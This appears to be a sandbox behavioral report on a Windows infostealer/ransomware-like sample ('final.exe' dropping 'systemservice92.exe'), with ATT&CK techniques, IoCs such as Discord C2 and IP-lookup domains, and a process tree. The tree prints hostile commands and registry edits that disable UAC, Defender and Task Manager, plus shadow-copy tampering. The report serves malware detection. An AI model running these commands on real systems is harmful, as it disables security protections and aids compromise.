c1fc2b876042045053f309285aa138ce7df4ab61e71d589723b13a96738cddf8

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

UAC bypass 3 TTPs 4 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2140	powershell.exe
4692	powershell.exe
3664	powershell.exe
1752	powershell.exe
4020	powershell.exe
3740	powershell.exe
4512	powershell.exe
7060	powershell.exe

Disables RegEdit via registry modification 1 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion

Disables cmd.exe use via registry modification 2 IoCs

persistence privilege_escalation

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1"	systemservice92.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	systemservice92.exe

Possible privilege escalation attempt 9 IoCs

exploit

pid	Process
6392	icacls.exe
396	icacls.exe
6148	icacls.exe
4904	icacls.exe
6320	icacls.exe
6800	takeown.exe
6992	icacls.exe
6468	icacls.exe
4932	icacls.exe

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\576a9l83yycwtk5c.exe	final.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\576a9l83yycwtk5c.exe	final.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\urmg3bl5bl5pmipj.exe	systemservice92.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\urmg3bl5bl5pmipj.exe	systemservice92.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemservice92.exe	systemservice92.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemservice92.exe	systemservice92.exe

Executes dropped EXE 2 IoCs

pid	Process
2236	systemservice92.exe
956	systemservice92.exe

Impair Defenses: Safe Mode Boot 1 TTPs 1 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Minimal	systemservice92.exe

Loads dropped DLL 64 IoCs

pid	Process
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe
904	final.exe

Modifies file permissions 1 TTPs 9 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
6468	icacls.exe
6992	icacls.exe
4932	icacls.exe
4904	icacls.exe
6320	icacls.exe
6392	icacls.exe
396	icacls.exe
6148	icacls.exe
6800	takeown.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File created	C:\$Sys-Manager\desktop.ini	final.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
11	discord.com
59	discord.com
33	discord.com
2	discord.com
3	discord.com
12	discord.com
22	discord.com
23	discord.com
26	discord.com

Looks up external IP address via web service 7 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
25	ipinfo.io
30	api64.ipify.org
2	api64.ipify.org
3	ipinfo.io
3	ip-api.com
8	api.ipify.org
24	api.ipify.org

Enumerates processes with tasklist 1 TTPs 64 IoCs

discovery

Process Discovery

T1057

pid	Process
3368	Process not Found
5836	tasklist.exe
9412	tasklist.exe
7400	tasklist.exe
5380	Process not Found
6796	Process not Found
8064	tasklist.exe
5028	tasklist.exe
9932	tasklist.exe
1772	tasklist.exe
5540	tasklist.exe
3356	Process not Found
5480	Process not Found
2508	tasklist.exe
7292	tasklist.exe
3120	Process not Found
1704	Process not Found
2988	tasklist.exe
8496	tasklist.exe
6096	Process not Found
4820	Process not Found
8844	tasklist.exe
3356	tasklist.exe
5292	Process not Found
7716	Process not Found
5920	tasklist.exe
2592	tasklist.exe
8920	tasklist.exe
3332	Process not Found
6276	Process not Found
5320	tasklist.exe
10096	tasklist.exe
5212	tasklist.exe
6316	tasklist.exe
2144	tasklist.exe
9408	Process not Found
6296	Process not Found
6700	Process not Found
4164	tasklist.exe
8548	Process not Found
8948	Process not Found
2972	Process not Found
2144	Process not Found
7644	Process not Found
8556	Process not Found
6452	tasklist.exe
3948	tasklist.exe
3284	Process not Found
1908	Process not Found
7728	Process not Found
7428	tasklist.exe
8988	tasklist.exe
9108	Process not Found
1900	Process not Found
5028	Process not Found
556	Process not Found
9380	Process not Found
8792	tasklist.exe
9476	Process not Found
8988	Process not Found
3056	tasklist.exe
5420	tasklist.exe
5240	tasklist.exe
7160	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 4 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2016	cmd.exe
2716	cmd.exe
1660	cmd.exe
5028	cmd.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x001700000002b140-1322.dat	pyinstaller

Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
persistence privilege_escalation

Accessibility Features
T1546.008

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 3 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1708	netsh.exe
7700	cmd.exe
7808	netsh.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000485242783223abf50000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000485242780000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090048524278000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d48524278000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000004852427800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Delays execution with timeout.exe 64 IoCs

pid	Process
7560	timeout.exe
5904	Process not Found
3148	Process not Found
3840	Process not Found
9240	timeout.exe
8080	timeout.exe
6048	Process not Found
9160	Process not Found
5312	Process not Found
6596	Process not Found
560	timeout.exe
5168	Process not Found
1588	timeout.exe
3704	Process not Found
5428	Process not Found
8608	Process not Found
2912	Process not Found
1832	timeout.exe
388	timeout.exe
5676	Process not Found
5716	Process not Found
8736	Process not Found
4064	Process not Found
3492	timeout.exe
5664	timeout.exe
9116	timeout.exe
7392	timeout.exe
5776	Process not Found
6264	Process not Found
4500	Process not Found
1036	Process not Found
8468	timeout.exe
7880	timeout.exe
5600	Process not Found
5272	Process not Found
9740	Process not Found
5464	timeout.exe
7984	timeout.exe
6784	Process not Found
2120	Process not Found
3756	Process not Found
3452	Process not Found
6396	Process not Found
9992	Process not Found
900	timeout.exe
6908	Process not Found
9364	Process not Found
9744	timeout.exe
6504	Process not Found
1152	timeout.exe
2004	timeout.exe
3100	Process not Found
4236	Process not Found
6780	Process not Found
5404	timeout.exe
7488	timeout.exe
6520	timeout.exe
8752	Process not Found
9584	Process not Found
9176	timeout.exe
2008	timeout.exe
8736	timeout.exe
3068	timeout.exe
8468	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
6580	vssadmin.exe

Kills process with taskkill 1 IoCs

pid	Process
5268	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133818371952842839"	chrome.exe

Modifies registry key 1 TTPs 14 IoCs

Modify Registry

pid	Process
1120	reg.exe
9932	reg.exe
5560	reg.exe
6820	reg.exe
3352	reg.exe
1872	reg.exe
7040	reg.exe
5012	reg.exe
4804	reg.exe
4404	reg.exe
1876	reg.exe
10048	reg.exe
5708	reg.exe
6832	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
6244	schtasks.exe
896	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3148	chrome.exe
3148	chrome.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
3664	powershell.exe
3664	powershell.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe
956	systemservice92.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	904	final.exe
Token: SeShutdownPrivilege	3148	chrome.exe
Token: SeCreatePagefilePrivilege	3148	chrome.exe
Token: SeShutdownPrivilege	3148	chrome.exe
Token: SeCreatePagefilePrivilege	3148	chrome.exe
Token: SeDebugPrivilege	1712	tasklist.exe
Token: SeShutdownPrivilege	3148	chrome.exe
Token: SeCreatePagefilePrivilege	3148	chrome.exe
Token: SeDebugPrivilege	1656	tasklist.exe
Token: SeShutdownPrivilege	3148	chrome.exe
Token: SeCreatePagefilePrivilege	3148	chrome.exe
Token: SeDebugPrivilege	3932	tasklist.exe
Token: SeShutdownPrivilege	3148	chrome.exe
Token: SeCreatePagefilePrivilege	3148	chrome.exe
Token: SeDebugPrivilege	2080	tasklist.exe
Token: SeShutdownPrivilege	3148	chrome.exe
Token: SeCreatePagefilePrivilege	3148	chrome.exe
Token: SeDebugPrivilege	3056	tasklist.exe
Token: SeDebugPrivilege	956	systemservice92.exe
Token: SeShutdownPrivilege	3148	chrome.exe
Token: SeCreatePagefilePrivilege	3148	chrome.exe
Token: SeDebugPrivilege	4312	tasklist.exe
Token: SeShutdownPrivilege	3148	chrome.exe
Token: SeCreatePagefilePrivilege	3148	chrome.exe
Token: SeDebugPrivilege	3528	tasklist.exe
Token: SeDebugPrivilege	3664	powershell.exe
Token: SeShutdownPrivilege	3148	chrome.exe
Token: SeCreatePagefilePrivilege	3148	chrome.exe
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	4692	powershell.exe
Token: SeDebugPrivilege	4020	powershell.exe
Token: SeDebugPrivilege	4512	powershell.exe
Token: SeDebugPrivilege	3740	powershell.exe
Token: SeDebugPrivilege	9840	tasklist.exe
Token: SeShutdownPrivilege	3148	chrome.exe
Token: SeCreatePagefilePrivilege	3148	chrome.exe
Token: SeDebugPrivilege	5268	taskkill.exe
Token: SeShutdownPrivilege	3148	chrome.exe
Token: SeCreatePagefilePrivilege	3148	chrome.exe
Token: SeDebugPrivilege	5360	tasklist.exe
Token: SeShutdownPrivilege	3148	chrome.exe
Token: SeCreatePagefilePrivilege	3148	chrome.exe
Token: SeDebugPrivilege	5420	tasklist.exe
Token: SeDebugPrivilege	5980	tasklist.exe
Token: SeDebugPrivilege	5240	tasklist.exe
Token: SeBackupPrivilege	6804	vssvc.exe
Token: SeRestorePrivilege	6804	vssvc.exe
Token: SeAuditPrivilege	6804	vssvc.exe
Token: SeDebugPrivilege	7060	powershell.exe
Token: SeDebugPrivilege	7388	tasklist.exe
Token: SeDebugPrivilege	7476	tasklist.exe
Token: SeDebugPrivilege	7548	tasklist.exe
Token: SeDebugPrivilege	7868	tasklist.exe
Token: SeDebugPrivilege	7988	tasklist.exe
Token: SeDebugPrivilege	8064	tasklist.exe
Token: SeDebugPrivilege	8132	tasklist.exe
Token: SeDebugPrivilege	5756	tasklist.exe
Token: SeDebugPrivilege	8260	tasklist.exe
Token: SeDebugPrivilege	8424	tasklist.exe
Token: SeDebugPrivilege	8588	tasklist.exe
Token: SeDebugPrivilege	8692	tasklist.exe
Token: SeDebugPrivilege	8764	tasklist.exe
Token: SeDebugPrivilege	8844	tasklist.exe

Suspicious use of FindShellTrayWindow 51 IoCs

pid	Process
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe

Suspicious use of SetWindowsHookEx 48 IoCs

pid	Process
6532	Magnify.exe
6532	Magnify.exe
6532	Magnify.exe
6532	Magnify.exe
6532	Magnify.exe
6532	Magnify.exe
6532	Magnify.exe
6532	Magnify.exe
6532	Magnify.exe
6532	Magnify.exe
6532	Magnify.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
6532	Magnify.exe
7992	msedge.exe
7844	msedge.exe
7844	msedge.exe
7992	msedge.exe
7992	msedge.exe
7844	msedge.exe
7844	msedge.exe
7992	msedge.exe
7844	msedge.exe
7844	msedge.exe
7992	msedge.exe
7992	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe
7844	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1160 wrote to memory of 904	1160	final.exe	77
PID 1160 wrote to memory of 904	1160	final.exe	77
PID 3148 wrote to memory of 3720	3148	chrome.exe	82
PID 3148 wrote to memory of 3720	3148	chrome.exe	82
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 2304	3148	chrome.exe	83
PID 3148 wrote to memory of 4928	3148	chrome.exe	84
PID 3148 wrote to memory of 4928	3148	chrome.exe	84
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85
PID 3148 wrote to memory of 4256	3148	chrome.exe	85

System policy modification 1 TTPs 1 IoCs

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStore = "1"	systemservice92.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 4 IoCs

Hidden Files and Directories

T1564.001

pid	Process
4252	attrib.exe
4932	attrib.exe
4896	attrib.exe
2916	attrib.exe

C:\Users\Admin\AppData\Local\Temp\final.exe
"C:\Users\Admin\AppData\Local\Temp\final.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1160
- C:\Users\Admin\AppData\Local\Temp\final.exe
  "C:\Users\Admin\AppData\Local\Temp\final.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Drops desktop.ini file(s)
  - Suspicious use of AdjustPrivilegeToken
  PID:904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /f"
    3⤵
    PID:3372
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /f
      4⤵
      Modifies registry key
      PID:3352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f"
    3⤵
    PID:4124
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f
      4⤵
      Modifies registry key
      PID:5012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\$Sys-Manager\systemservice.bat"
    3⤵
    PID:3992
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1712
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:3040
  - - C:\$Sys-Manager\systemservice92.exe
      "C:\$Sys-Manager\systemservice92.exe"
      4⤵
      Executes dropped EXE
      PID:2236
    - - C:\$Sys-Manager\systemservice92.exe
        
        "C:\$Sys-Manager\systemservice92.exe"
        5⤵
        Disables cmd.exe use via registry modification
        Drops file in Drivers directory
        Drops startup file
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:956
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /f"
        6⤵
        
        PID:1052
        
        C:\Windows\system32\reg.exe
        
        reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /f
        7⤵
        Modifies registry key
        
        PID:1876
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f"
        6⤵
        
        PID:3068
        
        C:\Windows\system32\reg.exe
        
        reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f
        7⤵
        Modifies registry key
        
        PID:9932
